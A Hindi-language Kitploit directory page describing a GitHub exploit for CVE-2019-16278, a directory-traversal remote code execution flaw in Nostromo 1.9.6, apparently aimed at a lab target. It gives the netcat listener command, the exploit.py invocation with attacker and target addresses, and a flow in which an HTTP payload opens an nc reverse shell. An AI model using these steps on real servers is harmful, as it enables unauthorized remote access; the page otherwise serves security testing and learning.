Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-16278-Nostromo-1.9.6-RCE — इस रिपॉज़िटरी में Nostromo Web Server 1.9.6 के लिए CVE-2019-16278 का एक एक्सप्लॉइट शामिल है, जो डायरेक्टरी ट्रैवर्सल भेद्यता के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है। स्क्रिप्ट रिवर्स शेल स्थापित करने के लिए pwntools का उपयोग करती है। केवल शैक्षिक और अधिकृत परीक्षण उपयोग के लिए। | Kitploit
उपकरण/GitHubGitHub/cancela24/cve-2019-16278-nostromo-1.9.6-rce
पेलोड जनरेशनशोषणशेलकोडवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubcancela24/cve-2019-16278-nostromo-1.9.6-rce

CVE-2019-16278-Nostromo-1.9.6-RCE

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

इस रिपॉज़िटरी में Nostromo Web Server 1.9.6 के लिए CVE-2019-16278 का एक एक्सप्लॉइट शामिल है, जो डायरेक्टरी ट्रैवर्सल भेद्यता के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है। स्क्रिप्ट रिवर्स शेल स्थापित करने के लिए pwntools का उपयोग करती है। केवल शैक्षिक और अधिकृत परीक्षण उपयोग के लिए।

11 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2019-16278-Nostromo-1.9.6-RCE

इस रिपॉजिटरी में Nostromo Web Server 1.9.6 के CVE-2019-16278 के लिए एक एक्सप्लॉइट है, जो डायरेक्टरी ट्रैवर्सल भेद्यता के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है। स्क्रिप्ट रिवर्स शेल स्थापित करने के लिए pwntools का उपयोग करती है। केवल शैक्षिक और अधिकृत परीक्षण उपयोग के लिए।

आवश्यकताएँ

  • Python 3.x
  • pwntools लाइब्रेरी

pwntools स्थापित करने के लिए, उपयोग करें:

root@kitploit:~
pip3 install pwntools

उपयोग

सेटअप

  1. लिसनर शुरू करें: हमलावर मशीन पर, रिवर्स शेल प्राप्त करने के लिए निर्दिष्ट पोर्ट पर एक लिसनर शुरू करें:

    root@kitploit:~
    nc -lvnp <attacker-port>
    
  2. स्क्रिप्ट चलाएँ: एक्सप्लॉइट स्क्रिप्ट को निष्पादित करने के लिए निम्न कमांड का उपयोग करें। आवश्यकतानुसार मान बदलें।

    root@kitploit:~
    python3 exploit.py --attacker-ip <attacker-ip> --attacker-port <attacker-port> [-t target-ip] [-p target-port]
    

उदाहरण

root@kitploit:~
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80

इस उदाहरण में:

  • --attacker-ip 10.10.14.15 हमलावर मशीन का IP पता है।
  • --attacker-port 4444 वह पोर्ट है जिस पर हमलावर मशीन रिवर्स शेल के लिए सुन रही है।
  • -t 10.10.10.165 लक्ष्य IP निर्दिष्ट करता है (डिफ़ॉल्ट 10.10.10.165 है)।
  • -p 80 लक्ष्य पोर्ट निर्दिष्ट करता है (डिफ़ॉल्ट 80 है)।

स्क्रिप्ट विकल्प

स्क्रिप्ट प्रवाह

  1. चेतावनी संदेश: उपयोगकर्ता को हमलावर मशीन पर लिसनर शुरू करने की याद दिलाता है।
  2. पेलोड निर्माण: netcat (nc) का उपयोग करके रिवर्स शेल कमांड के साथ एक HTTP अनुरोध बनाता है।
  3. पेलोड निष्पादन: पेलोड को लक्ष्य सर्वर पर भेजता है और रिवर्स शेल प्राप्त करने का प्रयास करता है।
  4. पुनः प्रयास: यदि प्रारंभिक प्रयास विफल हो जाता है, तो स्क्रिप्ट प्रत्येक प्रयास पर फीडबैक के साथ 3 बार तक पुनः प्रयास करती है।

कोड प्रवाह उदाहरण

सफल होने पर, आपको अपने लिसनर पर लक्ष्य प्रणाली तक पहुँच के साथ एक रिवर्स शेल प्राप्त होना चाहिए।

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए लेखक और योगदानकर्ता जिम्मेदार नहीं हैं। इसका जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर जिनके परीक्षण की अनुमति आपके पास है।

टूल डाउनलोड करें
विकल्पविवरणडिफ़ॉल्ट
-t, --targetरिमोट होस्ट का IP पता10.10.10.165
-p, --portलक्षित करने के लिए रिमोट होस्ट पर पोर्ट80
--attacker-ipरिवर्स शेल के लिए हमलावर मशीन का IP पताNone (आवश्यक)
--attacker-portरिवर्स शेल के लिए हमलावर मशीन पर पोर्टNone (आवश्यक)